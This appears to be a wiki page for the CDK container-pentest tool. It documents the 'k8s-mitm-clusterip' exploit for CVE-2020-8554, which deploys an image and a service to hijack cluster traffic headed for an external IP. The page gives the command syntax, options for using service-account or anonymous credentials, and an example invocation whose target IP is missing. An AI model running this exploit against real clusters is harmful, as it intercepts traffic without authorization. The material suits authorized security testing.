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Evaluate: k8s mitm clusterip

cdxy edited this page Jan 22, 2021 · 5 revisions

Exploit: k8s-mitm-clusterip

Exploit CVE-2020-8554: Man in the middle using ExternalIPs. It allows an attacker to intercept traffic that was intended for an external dependency.



  1. 部分CNI + Iptables 可劫持 POD network
  2. 部分CNI + IPVS 可劫持 可劫持 NODE network
  3. Global Router + IPVS 可劫持 可劫持 NODE network

因此在 minikube 里可能无法复现。

See more in


First it will deploy <image> in cluster, then create a service to hijack cluster traffic intended to send to remote :

cdk run k8s-mitm-clusterip (default|anonymous|<service-account-token-path>) <image> <ip> <port>

Request Options:
default: connect API server with pod's default service account token
anonymous: connect API server with user system:anonymous
<service-account-token-path>: connect API server with user-specified service account token.

Exploit Options:
image: target image to MITM hijack.
ip: target remote IP to hijack traffic.
port: target remote PORT to hijack traffic.


deploy image ubuntu in the cluster to hijack outgoing traffic towards

./cdk run k8s-mitm-clusterip default ubuntu 80

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